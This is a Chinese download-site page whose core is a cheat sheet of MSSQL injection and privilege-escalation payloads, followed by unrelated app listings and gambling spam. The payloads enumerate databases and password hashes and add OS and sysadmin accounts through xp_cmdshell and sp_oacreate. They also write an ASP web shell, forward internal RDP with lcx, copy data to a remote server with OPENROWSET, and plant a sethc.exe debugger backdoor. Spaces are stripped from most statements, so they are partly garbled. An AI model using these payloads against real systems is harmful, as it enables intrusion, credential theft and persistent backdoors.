菲哥哥注入语句笔记是一款sql注入工具,它可以注入一些要注意的东西,Sql注射经验,写成笔记了。足球大小球
1.爆所有库名
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases
//name数据库名filename数据库物理路径
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0
//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–
and0<>db_name(n)–
n改成0,1,2,3……就可以跨库
2.爆所有表名
+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–
//table_catalo保存当前数据库名称,table_name保存当前数据库中所有表
+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–
//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0
/+union+select+name,object_id,3,4,5+fromsys.tables–
3.爆所有字段名
+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–
//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系
+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0
//查询含有“pass”的字段
+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)
//查询yixiang_bizre表中的所有字段
+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–
//table_name表名称column_name字段名
4.添加用户
1、declare@oint;
2、execmaster..sp_oacreate'Shell.Application',@oout;
3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add
5.判断是不是SQL库
andexists(select*fromsysobjects)
6.所有账户名
+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//
7.加SQL账户
1、--创建个登陆mssql的帐号
2、;execmaster.dbo.sp_addloginname,pass;--
3、--把创建的mssql登陆帐号提升到sysadmin
4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--
8.启动组写入命令行和执行
EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-
9.LCX语句
;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–
//目标机器执行
lcx.exe-listen512007
//本机执行连接本机的的2007端口就可以了
10.win200爆目录
xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–
//获取WEB路径
11.恢复xp_cmdshell
;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’
//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了
12.open数据
insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest
//把test是本地表,中username的值插入到远程cmd表中的c字段里
13.判断权限
1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--
2、//sa权限
3、and(selectIS_MEMBER('db_owner'))=1-- // dbo
4、and(selectIS_MEMBER('public'))=1-- //public
14.DIR目录
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:
temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));
–接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–
这样就可以成功的浏览到所有的目录(文件夹)列表?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?
使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。
如:bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
15.判断站库分离
+and+host_name()==@@servername-- //判断站库是否分离
16.存储总结
xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’
xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开
dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’
xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’
17.判断xp_cmdshell
+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)
18.判断系统为win2003
And+charindex('5.3',@@verisdn)
19.echo写shell
;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-
20.停掉服务
execmaster..xp_servicecontrol‘stop’,’schedule’
execmaster..xp_servicecontrol‘start’,’schedule’
有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句
当xp_cmshell被删除或者无法使用的情况,我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。
Declare@runshellINT
ExecSP_OACreate‘wscript.shell’,@runshellout
ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’
当这些都失败了,试试关闭系统沙盒模式,它在注册表的位置是
HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode
默认键值为2,即只在Access的模式下开启沙盒模式,对应的键值是
0—在任何所有者中禁止启用安全模式
1–为仅在允许范围内
2–必须在access模式下
3–完全开启
我们要将其设置为0就可以关闭了,通过SQL语句实现
Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0
执行关闭成功后就可以执行系统命令
select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)
上面是提权思路。另外提下两种备份:
(1)Log备份(hta)
alertdatabase[dbname]setRECOVERYFULL–
createtablecmd(aimage)–
backuplog[dbname]todisk=’c:hta’withinit–
insertintocmd(a)values(‘[command]‘)–
backuplog[dbname]todisk=’系统启动目录hello.hta’–
droptablecmd–
(2)差异备份
backupdatabase[dbname]todisk=’c:db.bak’–
createtablecmd(cmdimage)–
insertintocmd(cmd)values(‘[command]‘)–
backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–
droptablecmd–
经验告诉我,将你要执行的command转换成十六进制成功率会比较高,但是这个比较被动。
另外就是可以通过注册表添加run启动项添加用户命令,这种也是被动,要等服务器重启。
看了这个工具,觉得还缺少一个很使用的方法,那就是映像劫持,位于注册表位置:
HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions
在这个键下面有一个Debugger的参数,如果不为空,就会处理。添加映像劫持方法的SQL语句如下:
execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’
千赢优乐亚博 北单必发指数 博马娱乐网 赛马会网址娱乐 彩特吧报码网展开内容
2017财神节祝福语图片下载-2017财神节说说带字图片高清版
新笑傲江湖渠道服互通版-新笑傲江湖小米专属礼包版1.0.280.0安卓互通版
家庭教师Family1.4.2地图下载-家庭教师Family1.4.2黑白双翼破解版【附攻略+定制礼包+脚本+免CD】
听听珈app苹果下载-听听珈2.0 最新版
剑魂之刃魔幻盛典手游下载-剑魂之刃魔幻盛典1.0官方正版
江湖传单机版下载-江湖传福利特权版1.0 爱趣版
艾鲁大陆iOS游戏下载-艾鲁大陆1.0 苹果版
全球大学录取通知书生成器-抽取你的录取通知书恶搞版网页版
能源计量下载-能源计量app1.2.2官方安卓版
闪电视频转换王14.8.0官方安装版
上古卷轴5恶魔猎手技能MOD绿色免费版
梦幻Mjourney下载官方版-梦幻Mjourney绘画软件1.0.0 最新版
sql2005标准版下载-sql2005标准版(SQL Server 2005 Standard Edition)32&64完整版
鄂煤服务司机版app下载-鄂煤服务司机版2.7 最新版
阅伴学生端app下载-阅伴学生端软件3.1.3 官方安卓版
8.6/119.3M
随会视频会议是一款视频会议软件,在软件之中,用户可以在线进行视频的会议聊天,期间高清的画面,视频的录制,会议的管控,团队之间的作战,快速的管理会议纪要!随会视频...
9.2/1,143.8M
上古有灵妖游戏还可以,玩法很多,人物方面,还算是挺好看的。游戏界面看上去井井有条,划分出家园,玩法,战役,这点很好至少看上去不会眼花缭乱。人物语音也很有趣。游戏...
7.8/946.3M
2048躺平版是一款融合弹球、骰子与2048玩法的休闲益智游戏,内容丰富且充满挑战性。游戏设计了众多关卡,每关内容独特,操作简单,玩家只需选择方向发射数字方块,...
9.1/1,783.0M
帮你戒烟APP助力用户科学摆脱烟瘾;支持用户填写专属问卷,问卷涵盖吸烟频率、烟龄、依赖程度等信息,全面了解个人抽烟情况;基于问卷数据生成个性化戒烟计划,避免“一...
9.1/882.0M
鬼灭猎鬼人游戏是一款非常好玩的策略卡牌游戏,二次元的游戏画风。玩家在游戏中选择自己出战的角色,了解角色的技能和装备,快速搭配出战。游戏玩法多样,还有丰富的隐藏角...
8.1/880.3M
发型相机是一款功能特效相机,为你准备多样化的发型,找到属于自己的专属发型,非常简单实用。发型相机功能发型相机是一款为爱美女士和男士设计的小软件,自拍的时候,你是...
长江航道图最新版下载航运通-长江航道图最新版1.7.0 官方版
8.8/1,857.5M
长江航道图app是一款由长江航道局官方发布的电子航道图应用,为在长江航行的船企提供精准的导航服务,支持智能语音播报,非常方便!长江航道图app介绍长江航道局官方...
少女的祈祷1.5地图下载-少女的祈祷1.5正式版【附攻略+隐藏英雄密码】
8.7/1,194.1M
少女的祈祷1.5正式版是一款魔兽防守地图,这款地图支持1到8人游戏,本次更新添加了全新隐藏英雄,游戏福利礼包,游戏指令,还有一些内容更新,快来下载最新版体验吧!...
哇屋装修app-哇屋装修(新房装修app)1.5.5 安卓最新版
10.0/483.0M
这里我们小编为各位户主们推荐了这一款哇屋装修app,功能比较强大,家装中介服务平台,自主施工团队,适合一些没多少经验的户主们装修房屋使用,有兴趣的可以来这里免费...
随便走AR导航app苹果版-随便走AR导航app6.3.6 官网ios版
9.2/143.7M
随便走AR导航app是一款非常不错的导航软件,为用户提供全息实景导航信息,详细为您展示指定地点周边的吃喝玩乐,非常不错,欢迎来下载!随便走AR导航app介绍一款...
27世纪人工智能系统下载-27世纪人工智能系统(知识问答软件)2.4.0.0 绿色版
7.6/1,572.9M
对于有些小伙伴来说,总是喜欢问很多充满趣味性的问题,但是却没有人给你回答时,就来下载27世纪人工智能系统,就能帮你回答任何你想知道的问题,关键是没有问题种类的限...
114便民网app下载-114便民网手机版2.6.0.8 官网最新版
8.4/1,156.3M
你的生活上面有什么问题,你有什么需要的话,现在就可以试试下面的这款114便民网络手机版,更好的为你提供各种各样的生活上面的服务!114便民网络介绍114便民网络...
coderbar(可编码)下载-coderbar(可编码)app1.0.7官方安卓版
9.3/420.1M
coderbar(可编码)app是一款IT技术学习软件,app上涵盖的课程非常丰富,用户下载就能够在上面进行学习,还有非常丰富的免费课程,用户可以直接进行学习,...
摇摆格斗游戏下载-Swipe Fight!(摇摆格斗手机正版)1.0官方版
8.3/1,978.1M
摇摆格斗手机正版是一款非常刺激的格斗闯关小游戏,需要击败每一个关卡中的对手,利用自己的格斗技巧,躲避敌人的攻击,海量道具等你免费选择,成为最顶尖的强者,炫酷的格...
火山哥哥让子弹飞游戏下载-火山哥哥让子弹飞(RangZiDanFei)1.0 最新版
9.8/1,225.0M
火山哥哥让子弹飞是一款由大神“火山哥哥”自制的小游戏,在游戏中玩家可以操控角色在鹅城冒险,用精湛的枪法消灭所有敌人,将电影角色Q萌化非常的讨喜,感兴趣的小伙伴快...
全自动封装工具包专业版 【智能封装工具包】v2.0 简体中文绿色免费版
7.9/1,745.4M
最智能的封装工具包,最傻瓜的操作方式,点击前请务必认真阅读窗口说明!强烈建议菜菜不要修改任何参数,只将驱动包拷入即可智能全自动使用!·使用...
9.7/439.3M
即玩云电脑是一款云游戏盒子,在这里玩家能通过该软件,在手机上玩到海量大型端游,而且运行流畅不卡顿,画质也保持在一个超高的水准,除此之外,即玩云电脑每天都有特惠福...
8.2/334.7M
这是一款戏曲文化传播中心,很多戏曲爱好者通过这个软件了解一些活动,还有其他书籍分享,在线观看各种戏曲,这是文化推广专用的软件!软件介绍文化丰台APP,北京市丰台...
初中生冬季安全教育主题班会ppt-中学生冬季安全教育主题班会ppt课件(共17页)ppt免费下载【图文精品版】
8.8/1,611.3M
中学生冬季安全教育主题班会ppt课件,总共有17页,首先讲述的是冬季运动安全知识,冬天运动之前一定要做好准备工作,先热身,让血液循环;第二个就介绍了交通安全,道...
8.3/1,283.8M
小人物大乱斗是一款策略对战3DRTS类手机游戏,这款游戏的背景比较简单,艾丽在艾拉伊古董店里收集了许多无价的古董,并且从中诞生了一些叫纳米人的小人物,玩家们要做...
全国违章查询手机版下载-全国违章查询助手6.4.136 最新版
8.4/333.3M
全国违章查询app是一款为车主提供便捷交通违章查询服务的手机应用程序。该应用的主要功能是帮助用户查询全国范围内的机动车违章信息。用户只需输入车牌号码或车辆识别码...
9.6/689.1M
《西普大陆》作为儿童时期知名的页游,是与洛克王国、赛尔号一同出名的作品,游戏目前的环境还算比较健康,暂时没有发现有过于超标的精灵,还是以策略属性为主,削弱数值层...
8.3/1,907.8M
使命召唤是风靡全球的顶级游戏,以高质量视觉效果呈现游戏品质,还原使命召唤系列的经典玩法、地图和角色,并针对手机端操作特点进行最优适配与优化,召唤战友共赴CODM...
8.8/993.4M
文星阅读是一款全新推出的读书综合服务app。这里包含了海量的图书种类,想看什么类型的名著小说都可以在这里看到。满足用户的看书需求,随时随地线上观看,让你在家不无...
会易通app下载手机版-会易通4G版安卓版4.2.152164.0725 最新版
9.3/276.0M
会易通app下载安卓手机版,随时随地只要有移动设备就能召开会议,支持会议记录、回访,功能非常的全面且强大,提升办公效率,有需要的朋友就来东坡下载。会易通app介...